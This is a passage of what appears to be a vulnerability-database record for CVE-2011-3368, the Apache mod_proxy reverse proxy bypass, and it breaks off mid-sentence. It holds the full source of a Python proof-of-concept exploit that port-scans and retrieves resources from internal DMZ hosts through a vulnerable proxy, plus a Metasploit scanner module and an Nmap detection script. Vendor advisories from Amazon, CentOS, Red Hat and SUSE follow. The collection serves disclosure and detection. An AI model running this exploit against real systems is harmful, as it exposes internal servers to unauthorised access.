getopt.GetoptError:\r\n\t\tusage()\r\n\t\tsys.exit(2)\r\n\r\n\ttry:\r\n\t\tfor o, a in opts:\r\n\t\t\tif o in (\"-h\", \"--help\"):\r\n\t\t\t\tusage()\r\n\t\t\t\tsys.exit(2)\r\n\t\t\tif o == \"-u\":\r\n\t\t\t\turl=a\r\n\t\t\tif o == \"-r\":\r\n\t\t\t\tapache_target=a\r\n\t\t\tif o == \"-p\":\r\n\t\t\t\tapache_port=a\r\n\t\t\tif o == \"-d\":\r\n\t\t\t\tinternal_target = a\r\n\t\t\tif o == \"-e\":\r\n\t\t\t\tinternal_port=a\r\n\t\t\tif o == \"-g\":\r\n\t\t\t\tresource=a\t\t\t\t\r\n\t\t\r\n\texcept getopt.GetoptError:\r\n\t\tusage()\r\n\t\tsys.exit(2)\r\n\t\t\r\n\tif apache_target == \"\":\r\n\t\tusage()\r\n\t\tsys.exit(2)\r\n\r\n\r\nurl = \"/\"\r\napache_target = \"\"\r\napache_port = \"80\"\r\ninternal_target = \"127.0.0.1\"\r\ninternal_port = \"\"\r\nresource = \"/\"\r\n\r\nmain()\r\n\r\nif internal_port!=\"\":\r\n\ttested_ports = [internal_port]\r\nelse:\r\n\ttested_ports = known_ports\r\n\r\nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)\r\n\r\n\r\n", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:NONE/A:NONE/"}, "sourceHref": "https://www.exploit-db.com/download/17969/"}], "exploitpack": [{"lastseen": "2020-04-01T19:04:03", "description": "\nApache mod_proxy - Reverse Proxy Exposure", "edition": 1, "published": "2011-10-11T00:00:00", "title": "Apache mod_proxy - Reverse Proxy Exposure", "type": "exploitpack", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2011-10-11T00:00:00", "id": "EXPLOITPACK:460143F0ACAE117DD79BD75EDFDA154B", "href": "", "sourceData": "#!/usr/bin/env python\n\nimport socket\nimport string\nimport getopt, sys\n\n\nknown_ports = [0,21,22,23,25,53,69,80,110,137,139,443,445,3306,3389,5432,5900,8080]\n\ndef send_request(url, apache_target, apache_port, internal_target, internal_port, resource):\n\n\tget = \"GET \" + url + \"@\" + internal_target + \":\" + internal_port + \"/\" + resource + \" HTTP/1.1\\r\\n\"\n\tget = get + \"Host: \" + apache_target + \"\\r\\n\\r\\n\"\n\t\n\tremoteserver = socket.socket(socket.AF_INET, socket.SOCK_STREAM)\n\tremoteserver.settimeout(3)\n\n\ttry:\n\t\tremoteserver.connect((apache_target, int(apache_port)))\n\t\tremoteserver.send(get)\n\t\treturn remoteserver.recv(4096)\n\texcept:\n\t\treturn \"\"\n\ndef get_banner(result):\n\treturn result[string.find(result, \"\\r\\n\\r\\n\")+4:]\n\n\ndef scan_host(url, apache_target, apache_port, internal_target, tested_ports, resource):\n\n\tprint_banner(url, apache_target, apache_port, internal_target, tested_ports, resource)\n\tfor port in tested_ports:\n\t\tport = str(port)\n\t\tresult = send_request(url, apache_target, apache_port, internal_target, port, resource)\n\t\tif string.find(result,\"HTTP/1.1 200\")!=-1 or \\\n\t\tstring.find(result,\"HTTP/1.1 30\")!=-1 or \\\n\t\tstring.find(result,\"HTTP/1.1 502\")!=-1:\n\t\t\tprint \"- Open port: \" + port + \"/TCP\"\n\t\t\tprint get_banner(result)\n\t\telif len(result)==0:\n\t \t\tprint \"- Filtered port: \" + port + \"/TCP\"\n\t\telse:\n\t \t\tprint \"- Closed port: \" + port + \"/TCP\"\n\t\t\t\n\ndef usage():\n\tprint\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\n\tprint \"http://www.secforce.co.uk\"\n\tprint\n\tprint \"usage():\"\n\tprint \"python apache_scan.py [options]\"\n\tprint\n\tprint \" [options]\"\n\tprint \"\t\t-r: Remote Apache host\"\n\tprint \"\t\t-p: Remote Apache port (default is 80)\"\n\tprint \"\t\t-u: URL on the remote web server (default is /)\"\n\tprint \"\t\t-d: Host in the DMZ (default is 127.0.0.1)\"\n\tprint \"\t\t-e: Port in the DMZ (enables 'single port scan')\"\n\tprint \"\t\t-g: GET request to the host in the DMZ (default is /)\"\n\tprint \"\t\t-h: Help page\"\n\tprint\n\tprint \"examples:\"\n\tprint \" - Port scan of the remote host\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif\"\n\tprint \" - Port scan of a host in the DMZ\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local\"\n\tprint \" - Retrieve a resource from a host in the DMZ\"\n\tprint \"\t\tpython apache_scan.py -r www.example.com -u /images/test.gif -d internalhost.local -e 80 -g /accounts/index.html\"\n\tprint\n\ndef print_banner(url, apache_target, apache_port, internal_target, tested_ports, resource):\n\tprint\n\tprint \"CVE-2011-3368 proof of concept by Rodrigo Marcos\"\n\tprint \"http://www.secforce.co.uk\"\n\tprint\n\tprint \" [+] Target: \" + apache_target\n\tprint \" [+] Target port: \" + apache_port\n\tprint \" [+] Internal host: \" + internal_target\n\tprint \" [+] Tested ports: \" + str(tested_ports)\n\tprint \" [+] Internal resource: \" + resource\n\tprint\n\n\ndef main():\n\n\tglobal apache_target\n\tglobal apache_port\n\tglobal url\n\tglobal internal_target\n\tglobal internal_port\n\tglobal resource\n\n\ttry:\n\t\topts, args = getopt.getopt(sys.argv[1:], \"u:r:p:d:e:g:h\", [\"help\"])\n\texcept getopt.GetoptError:\n\t\tusage()\n\t\tsys.exit(2)\n\n\ttry:\n\t\tfor o, a in opts:\n\t\t\tif o in (\"-h\", \"--help\"):\n\t\t\t\tusage()\n\t\t\t\tsys.exit(2)\n\t\t\tif o == \"-u\":\n\t\t\t\turl=a\n\t\t\tif o == \"-r\":\n\t\t\t\tapache_target=a\n\t\t\tif o == \"-p\":\n\t\t\t\tapache_port=a\n\t\t\tif o == \"-d\":\n\t\t\t\tinternal_target = a\n\t\t\tif o == \"-e\":\n\t\t\t\tinternal_port=a\n\t\t\tif o == \"-g\":\n\t\t\t\tresource=a\t\t\t\t\n\t\t\n\texcept getopt.GetoptError:\n\t\tusage()\n\t\tsys.exit(2)\n\t\t\n\tif apache_target == \"\":\n\t\tusage()\n\t\tsys.exit(2)\n\n\nurl = \"/\"\napache_target = \"\"\napache_port = \"80\"\ninternal_target = \"127.0.0.1\"\ninternal_port = \"\"\nresource = \"/\"\n\nmain()\n\nif internal_port!=\"\":\n\ttested_ports = [internal_port]\nelse:\n\ttested_ports = known_ports\n\nscan_host(url, apache_target, apache_port, internal_target, tested_ports, resource)", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "metasploit": [{"lastseen": "2020-03-11T23:10:37", "description": "Scan for poorly configured reverse proxy servers. By default, this module attempts to force the server to make a request with an invalid domain name. Then, if the bypass is successful, the server will look it up and of course fail, then responding with a status code 502. A baseline status code is always established and if that baseline matches your test status code, the injection attempt does not occur. \"set VERBOSE true\" if you are paranoid and want to catch potential false negatives. Works best against Apache and mod_rewrite\n", "published": "2011-10-10T22:34:50", "type": "metasploit", "title": "Apache Reverse Proxy Bypass Vulnerability Scanner", "bulletinFamily": "exploit", "cvelist": ["CVE-2011-3368"], "modified": "2017-07-24T13:26:21", "id": "MSF:AUXILIARY/SCANNER/HTTP/REWRITE_PROXY_BYPASS", "href": "", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::HttpClient\n include Msf::Auxiliary::Scanner\n\n def initialize\n super(\n 'Name' => 'Apache Reverse Proxy Bypass Vulnerability Scanner',\n 'Description' => %q{\n Scan for poorly configured reverse proxy servers.\n By default, this module attempts to force the server to make\n a request with an invalid domain name. Then, if the bypass\n is successful, the server will look it up and of course fail,\n then responding with a status code 502. A baseline status code\n is always established and if that baseline matches your test\n status code, the injection attempt does not occur.\n \"set VERBOSE true\" if you are paranoid and want to catch potential\n false negatives. Works best against Apache and mod_rewrite\n },\n 'Author' => ['chao-mu'],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n ['URL', 'http://www.contextis.com/research/blog/reverseproxybypass/'],\n ['CVE', '2011-3368'],\n ]\n )\n\n register_options(\n [\n OptString.new('ESCAPE_SEQUENCE',\n [true, 'Character(s) that terminate the rewrite rule', '@']),\n\n OptString.new('INJECTED_URI',\n [true, 'String injected after escape sequence', '...']),\n\n OptInt.new('EXPECTED_RESPONSE',\n [true, 'Status code that indicates vulnerability', 502]),\n\n OptString.new('BASELINE_URI',\n [true, 'Requested to establish that EXPECTED_RESPONSE is not the usual response', '/']),\n ])\n end\n\n def make_request(host, uri, timeout=20)\n begin\n requested_at = Time.now.utc\n response = send_request_raw({'uri' => uri}, timeout)\n responded_at = Time.now.utc\n rescue ::Rex::ConnectionError => e\n vprint_error e.to_s\n return nil\n end\n\n if response.nil?\n vprint_error \"#{rhost}:#{rport} Request timed out\"\n return nil\n end\n\n seconds_transpired = (responded_at - requested_at).to_f\n vprint_status \"#{rhost}:#{rport} Server took #{seconds_transpired} seconds to respond to URI #{uri}\"\n\n status_code = response.code\n vprint_status \"#{rhost}:#{rport} Server responded with status code #{status_code} to URI #{uri}\"\n\n return {\n :requested_at => requested_at,\n :responded_at => responded_at,\n :status_code => status_code\n }\n end\n\n def run_host(host)\n test_status_code = datastore['EXPECTED_RESPONSE']\n\n baseline = make_request(host, datastore['BASELINE_URI'])\n if baseline.nil?\n return\n end\n\n if baseline[:status_code] == test_status_code\n vprint_error \"#{rhost}:#{rport} The baseline status code for #{host} matches our test's\"\n return\n end\n\n uri = datastore['ESCAPE_SEQUENCE'] + datastore['INJECTED_URI']\n injection_info = make_request(host, uri, 60)\n\n status_code = injection_info[:status_code]\n if status_code == test_status_code\n print_good \"#{rhost}:#{rport} Server appears to be vulnerable!\"\n report_vuln(\n :host => host,\n :port => rport,\n :proto => 'tcp',\n :sname => ssl ? 'https' : 'http',\n :name => self.name,\n :info => \"Module #{self.fullname} obtained #{status_code} when requesting #{uri}\",\n :refs => self.references,\n :exploited_at => injection_info[:requested_at]\n )\n end\n end\nend\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master//modules/auxiliary/scanner/http/rewrite_proxy_bypass.rb"}], "nmap": [{"lastseen": "2019-05-30T17:04:43", "description": "Tests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server's reverse proxy mode. The script will run 3 tests: \n\n * the loopback test, with 3 payloads to handle different rewrite rules \n * the internal hosts test. According to Contextis, we expect a delay before a server error. \n * The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway. \n\nReferences: \n\n * http://www.contextis.com/research/blog/reverseproxybypass/\n\n## Script Arguments \n\n#### http-vuln-cve2011-3368.prefix \n\nsets the path prefix (directory) to check for the vulnerability.\n\n#### slaxml.debug \n\nSee the documentation for the slaxml library. \n\n#### http.host, http.max-body-size, http.max-cache-size, http.max-pipeline, http.pipeline, http.truncated-ok, http.useragent \n\nSee the documentation for the http library. \n\n#### smbdomain, smbhash, smbnoguest, smbpassword, smbtype, smbusername \n\nSee the documentation for the smbauth library. \n\n#### vulns.short, vulns.showall \n\nSee the documentation for the vulns library. \n\n## Example Usage \n \n \n nmap --script http-vuln-cve2011-3368 <targets>\n \n\n## Script Output \n \n \n PORT STATE SERVICE\n 80/tcp open http\n | http-vuln-cve2011-3368:\n | VULNERABLE:\n | Apache mod_proxy Reverse Proxy Security Bypass\n | State: VULNERABLE\n | IDs: CVE:CVE-2011-3368 BID:49957\n | Description:\n | An exposure was reported affecting the use of Apache HTTP Server in\n | reverse proxy mode. The exposure could inadvertently expose internal\n | servers to remote users who send carefully crafted requests.\n | Disclosure date: 2011-10-05\n | Extra information:\n | Proxy allows requests to external websites\n | References:\n | https://www.securityfocus.com/bid/49957\n |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\n \n\n## Requires \n\n * http\n * os\n * shortport\n * stdnse\n * string\n * vulns\n * rand\n\n* * *\n", "edition": 11, "published": "2011-11-17T19:33:19", "title": "http-vuln-cve2011-3368 NSE Script", "type": "nmap", "bulletinFamily": "scanner", "cvelist": ["CVE-2011-3368"], "modified": "2019-04-02T16:51:36", "id": "NMAP:HTTP-VULN-CVE2011-3368.NSE", "href": "https://nmap.org/nsedoc/scripts/http-vuln-cve2011-3368.html", "sourceData": "local http = require \"http\"\nlocal os = require \"os\"\nlocal shortport = require \"shortport\"\nlocal stdnse = require \"stdnse\"\nlocal string = require \"string\"\nlocal vulns = require \"vulns\"\nlocal rand = require \"rand\"\n\ndescription = [[\nTests for the CVE-2011-3368 (Reverse Proxy Bypass) vulnerability in Apache HTTP server's reverse proxy mode.\nThe script will run 3 tests:\n* the loopback test, with 3 payloads to handle different rewrite rules\n* the internal hosts test. According to Contextis, we expect a delay before a server error.\n* The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.\n\nReferences:\n* http://www.contextis.com/research/blog/reverseproxybypass/\n]]\n\n---\n-- @usage\n-- nmap --script http-vuln-cve2011-3368 <targets>\n--\n-- @output\n-- PORT STATE SERVICE\n-- 80/tcp open http\n-- | http-vuln-cve2011-3368:\n-- | VULNERABLE:\n-- | Apache mod_proxy Reverse Proxy Security Bypass\n-- | State: VULNERABLE\n-- | IDs: CVE:CVE-2011-3368 BID:49957\n-- | Description:\n-- | An exposure was reported affecting the use of Apache HTTP Server in\n-- | reverse proxy mode. The exposure could inadvertently expose internal\n-- | servers to remote users who send carefully crafted requests.\n-- | Disclosure date: 2011-10-05\n-- | Extra information:\n-- | Proxy allows requests to external websites\n-- | References:\n-- | https://www.securityfocus.com/bid/49957\n-- |_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368\n--\n-- @args http-vuln-cve2011-3368.prefix sets the path prefix (directory) to check for the vulnerability.\n--\n\nauthor = {\"Ange Gutek\", \"Patrik Karlsson\"}\nlicense = \"Same as Nmap--See https://nmap.org/book/man-legal.html\"\ncategories = {\"intrusive\", \"vuln\"}\n\n\n\nportrule = shortport.http\n\naction = function(host, port)\n\n local vuln = {\n title = 'Apache mod_proxy Reverse Proxy Security Bypass',\n IDS = { CVE='CVE-2011-3368', BID='49957'},\n description = [[\nAn exposure was reported affecting the use of Apache HTTP Server in\nreverse proxy mode. The exposure could inadvertently expose internal\nservers to remote users who send carefully crafted requests.]],\n references = { 'https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2011-3368' },\n dates = {\n disclosure = { year='2011', month='10', day='05'}\n },\n }\n\n local report = vulns.Report:new(SCRIPT_NAME, host, port)\n local prefix = stdnse.get_script_args(\"http-vuln-cve2011-3368.prefix\") or \"\"\n\n -- Take a reference chrono for a 404\n local start = os.time(os.date('*t'))\n local random_page = rand.random_alpha(20)\n local reference = http.get(host,port,(\"%s/%s.htm\"):format(prefix,random_page))\n local chrono_404 = os.time(os.date('*t'))-start\n\n -- TEST 1: the loopback test, with 3 payloads to handle different rewrite rules\n local all\n all = http.pipeline_add((\"%s@localhost\"):format(prefix),nil, all)\n all = http.pipeline_add((\"%s:@localhost\"):format(prefix),nil, all)\n all = http.pipeline_add((\"%s:@localhost:80\"):format(prefix), nil, all)\n\n local bypass_request = http.pipeline_go(host,port, all)\n if ( not(bypass_request) ) then\n stdnse.debug1(\"got no answers from pipelined queries\")\n return stdnse.format_output(false, \"Got no answers from pipelined queries\")\n end\n\n\n -- going through the results of TEST 1 we could see\n -- * 200 OK\n -- o This could be the result of the server being vulnerable\n -- o This could also be the result of a generic error page\n -- * 40X Error\n -- o This is most likely the result of the server NOT being vulnerable\n --\n -- We can not determine whether the server is vulnerable or not solely\n -- by relying on the 200 OK. If we have no 200 OK abort, otherwise continue\n local got_200_ok\n for _, response in ipairs(bypass_request) do\n if ( response.status == 200 ) then\n got_200_ok = true\n end\n end\n\n -- if we didn't get at least one 200 OK, the server is most like NOT vulnerable\n if ( not(got_200_ok) ) then\n vuln.state = vulns.STATE.NOT_VULN\n return report:make_output(vuln)\n end\n\n for i=1, #bypass_request, 1 do\n stdnse.debug1(\"test %d returned a %d\",i,bypass_request[i].status)\n\n -- here a 400 should be the evidence for a patched server.\n if ( bypass_request[i].status == 200 and vuln.state ~= vulns.STATE.VULN ) then\n\n -- TEST 2: the internal hosts test. According to Contextis, we expect a delay before a server error.\n -- According to my (Patrik) tests, internal hosts reachable by the server may return instant responses\n local tests = {\n { prefix = \"\", suffix = \"\" },\n { prefix = \":\", suffix = \"\"},\n { prefix = \":\", suffix = \":80\"}\n }\n\n -- try a bunch of hosts, and hope we hit one that's\n -- not on the network, this will give us the delay we're expecting\n local hosts = {\n \"10.10.10.10\",\n \"192.168.211.211\",\n \"172.16.16.16\"\n }\n\n -- perform one request for each host, and stop once we\n -- receive a timeout for one of them\n for _, h in ipairs(hosts) do\n local response = http.get(\n host,\n port,\n (\"%s%s@%s%s\"):format(prefix, tests[i].prefix, h, tests[i].suffix),\n { timeout = ( chrono_404 + 5 ) * 1000 }\n )\n -- check if the GET timed out\n if ( not(response.status) ) then\n vuln.state = vulns.STATE.VULN\n break\n end\n end\n end\n end\n\n -- TEST 3: The external website test. This does not mean that you can reach a LAN ip, but this is a relevant issue anyway.\n local external = http.get(host,port, (\"%s@scanme.nmap.org\"):format(prefix))\n if ( external.status == 200 and string.match(external.body,\"Go ahead and ScanMe\") ) then\n vuln.extra_info = \"Proxy allows requests to external websites\"\n end\n return report:make_output(vuln)\nend\n\n", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "amazon": [{"lastseen": "2020-11-10T12:35:45", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3348"], "description": "**Issue Overview:**\n\nIt was discovered that the Apache HTTP Server did not properly validate the request URI for proxied requests. In certain configurations, if a reverse proxy used the ProxyPassMatch directive, or if it used the RewriteRule directive with the proxy flag, a remote attacker could make the proxy connect to an arbitrary server, possibly disclosing sensitive information from internal web servers not directly accessible to the attacker. ([CVE-2011-3368 __](<https://access.redhat.com/security/cve/CVE-2011-3368>))\n\nIt was discovered that mod_proxy_ajp incorrectly returned an \"Internal Server Error\" response when processing certain malformed HTTP requests, which caused the back-end server to be marked as failed in configurations where mod_proxy was used in load balancer mode. A remote attacker could cause mod_proxy to not send requests to back-end AJP (Apache JServ Protocol) servers for the retry timeout period or until all back-end servers were marked as failed. ([CVE-2011-3348 __](<https://access.redhat.com/security/cve/CVE-2011-3348>))\n\n \n**Affected Packages:** \n\n\nhttpd\n\n \n**Issue Correction:** \nRun _yum update httpd_ to update your system.\n\n \n\n\n**New Packages:**\n \n \n i686: \n httpd-devel-2.2.21-1.19.amzn1.i686 \n httpd-tools-2.2.21-1.19.amzn1.i686 \n httpd-2.2.21-1.19.amzn1.i686 \n mod_ssl-2.2.21-1.19.amzn1.i686 \n httpd-debuginfo-2.2.21-1.19.amzn1.i686 \n \n noarch: \n httpd-manual-2.2.21-1.19.amzn1.noarch \n \n src: \n httpd-2.2.21-1.19.amzn1.src \n \n x86_64: \n mod_ssl-2.2.21-1.19.amzn1.x86_64 \n httpd-debuginfo-2.2.21-1.19.amzn1.x86_64 \n httpd-tools-2.2.21-1.19.amzn1.x86_64 \n httpd-devel-2.2.21-1.19.amzn1.x86_64 \n httpd-2.2.21-1.19.amzn1.x86_64 \n \n \n", "edition": 4, "modified": "2011-10-31T18:19:00", "published": "2011-10-31T18:19:00", "id": "ALAS-2011-009", "href": "https://alas.aws.amazon.com/ALAS-2011-9.html", "title": "Medium: httpd", "type": "amazon", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "centos": [{"lastseen": "2019-12-20T18:26:33", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3192"], "description": "**CentOS Errata and Security Advisory** CESA-2011:1392\n\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the\nrequest URI for proxied requests. In certain configurations, if a reverse\nproxy used the ProxyPassMatch directive, or if it used the RewriteRule\ndirective with the proxy flag, a remote attacker could make the proxy\nconnect to an arbitrary server, possibly disclosing sensitive information\nfrom internal web servers not directly accessible to the attacker.\n(CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting this\nissue.\n\nThis update also fixes the following bug:\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP header\nvalues. This update corrects those regressions. (BZ#736593, BZ#736594)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2011-November/030209.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-November/030210.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-October/030163.html\nhttp://lists.centos.org/pipermail/centos-announce/2011-October/030164.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-suexec\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2011-1392.html", "edition": 4, "modified": "2011-11-09T20:46:44", "published": "2011-10-20T21:19:56", "href": "http://lists.centos.org/pipermail/centos-announce/2011-October/030163.html", "id": "CESA-2011:1392", "title": "httpd, mod_ssl security update", "type": "centos", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-12-20T18:27:47", "bulletinFamily": "unix", "cvelist": ["CVE-2011-4317", "CVE-2011-3607", "CVE-2012-0031", "CVE-2011-3639", "CVE-2012-0053", "CVE-2011-3368"], "description": "**CentOS Errata and Security Advisory** CESA-2012:0128\n\n\nThe Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1391) did not completely address the problem. An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request,\nor by using a specially-crafted URI. (CVE-2011-3639, CVE-2011-4317)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon will be restarted automatically.\n\n\n**Merged security bulletin from advisories:**\nhttp://lists.centos.org/pipermail/centos-announce/2012-February/030471.html\n\n**Affected packages:**\nhttpd\nhttpd-devel\nhttpd-manual\nhttpd-tools\nmod_ssl\n\n**Upstream details at:**\nhttps://rhn.redhat.com/errata/RHSA-2012-0128.html", "edition": 3, "modified": "2012-02-14T11:13:29", "published": "2012-02-14T11:13:29", "href": "http://lists.centos.org/pipermail/centos-announce/2012-February/030471.html", "id": "CESA-2012:0128", "title": "httpd, mod_ssl security update", "type": "centos", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "redhat": [{"lastseen": "2019-08-13T18:46:20", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3192", "CVE-2011-3368"], "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the\nrequest URI for proxied requests. In certain configurations, if a reverse\nproxy used the ProxyPassMatch directive, or if it used the RewriteRule\ndirective with the proxy flag, a remote attacker could make the proxy\nconnect to an arbitrary server, possibly disclosing sensitive information\nfrom internal web servers not directly accessible to the attacker.\n(CVE-2011-3368)\n\nRed Hat would like to thank Context Information Security for reporting this\nissue.\n\nThis update also fixes the following bug:\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP header\nvalues. This update corrects those regressions. (BZ#736593, BZ#736594)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2017-09-08T12:05:23", "published": "2011-10-20T04:00:00", "id": "RHSA-2011:1392", "href": "https://access.redhat.com/errata/RHSA-2011:1392", "type": "redhat", "title": "(RHSA-2011:1392) Moderate: httpd security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:48", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3192", "CVE-2011-3348", "CVE-2011-3368"], "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the Apache HTTP Server did not properly validate the\nrequest URI for proxied requests. In certain configurations, if a reverse\nproxy used the ProxyPassMatch directive, or if it used the RewriteRule\ndirective with the proxy flag, a remote attacker could make the proxy\nconnect to an arbitrary server, possibly disclosing sensitive information\nfrom internal web servers not directly accessible to the attacker.\n(CVE-2011-3368)\n\nIt was discovered that mod_proxy_ajp incorrectly returned an \"Internal\nServer Error\" response when processing certain malformed HTTP requests,\nwhich caused the back-end server to be marked as failed in configurations\nwhere mod_proxy was used in load balancer mode. A remote attacker could\ncause mod_proxy to not send requests to back-end AJP (Apache JServ\nProtocol) servers for the retry timeout period or until all back-end\nservers were marked as failed. (CVE-2011-3348)\n\nRed Hat would like to thank Context Information Security for reporting the\nCVE-2011-3368 issue.\n\nThis update also fixes the following bug:\n\n* The fix for CVE-2011-3192 provided by the RHSA-2011:1245 update\nintroduced regressions in the way httpd handled certain Range HTTP header\nvalues. This update corrects those regressions. (BZ#736592)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon must be restarted for the update to take effect.\n", "modified": "2018-06-06T20:24:24", "published": "2011-10-20T04:00:00", "id": "RHSA-2011:1391", "href": "https://access.redhat.com/errata/RHSA-2011:1391", "type": "redhat", "title": "(RHSA-2011:1391) Moderate: httpd security and bug fix update", "cvss": {"score": 7.8, "vector": "AV:N/AC:L/Au:N/C:N/I:N/A:C"}}, {"lastseen": "2019-08-13T18:44:33", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3607", "CVE-2011-3639", "CVE-2012-0031", "CVE-2012-0053"], "description": "The Apache HTTP Server is a popular web server.\n\nIt was discovered that the fix for CVE-2011-3368 (released via\nRHSA-2011:1392) did not completely address the problem. An attacker could\nbypass the fix and make a reverse proxy connect to an arbitrary server not\ndirectly accessible to the attacker by sending an HTTP version 0.9 request.\n(CVE-2011-3639)\n\nThe httpd server included the full HTTP header line in the default error\npage generated when receiving an excessively long or malformed header.\nMalicious JavaScript running in the server's domain context could use this\nflaw to gain access to httpOnly cookies. (CVE-2012-0053)\n\nAn integer overflow flaw, leading to a heap-based buffer overflow, was\nfound in the way httpd performed substitutions in regular expressions. An\nattacker able to set certain httpd settings, such as a user permitted to\noverride the httpd configuration for a specific directory using a\n\".htaccess\" file, could use this flaw to crash the httpd child process or,\npossibly, execute arbitrary code with the privileges of the \"apache\" user.\n(CVE-2011-3607)\n\nA flaw was found in the way httpd handled child process status information.\nA malicious program running with httpd child process privileges (such as a\nPHP or CGI script) could use this flaw to cause the parent httpd process to\ncrash during httpd service shutdown. (CVE-2012-0031)\n\nAll httpd users should upgrade to these updated packages, which contain\nbackported patches to correct these issues. After installing the updated\npackages, the httpd daemon will be restarted automatically.\n", "modified": "2017-09-08T12:08:34", "published": "2012-02-21T05:00:00", "id": "RHSA-2012:0323", "href": "https://access.redhat.com/errata/RHSA-2012:0323", "type": "redhat", "title": "(RHSA-2012:0323) Moderate: httpd security update", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}], "suse": [{"lastseen": "2016-09-04T12:42:10", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3192", "CVE-2011-3348"], "description": "This update fixes several security issues in the Apache\n webserver.\n\n The patch for the ByteRange remote denial of service attack\n (CVE-2011-3192) was refined and the configuration options\n used by upstream were added. Introduce new config option:\n Allow MaxRanges Number of ranges requested, if exceeded,\n the complete content is served. default: 200 0|unlimited:\n unlimited none: Range headers are ignored. This option is a\n backport from 2.2.21.\n\n Also fixed: CVE-2011-3348: Denial of service in proxy_ajp\n when using a undefined method.\n\n CVE-2011-3368: Exposure of internal servers via reverse\n proxy methods with mod_proxy enabled and incorrect Rewrite\n or Proxy Rules.\n\n", "edition": 1, "modified": "2011-11-04T09:08:34", "published": "2011-11-04T09:08:34", "id": "OPENSUSE-SU-2011:1217-1", "href": "http://lists.opensuse.org/opensuse-security-announce/2011-11/msg00009.html", "type": "suse", "title": "apache2: Fixed several security issues (important)", "cvss": {"score": 7.8, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:46", "bulletinFamily": "unix", "cvelist": ["CVE-2011-3368", "CVE-2011-3192", "CVE-2011-3348"], "description": "This update brings Apache to version 2.2.12.\n\n The main reason is the enablement of the Server Name\n Indication (SNI) that allows several SSL-enabled domains\n on one IP address 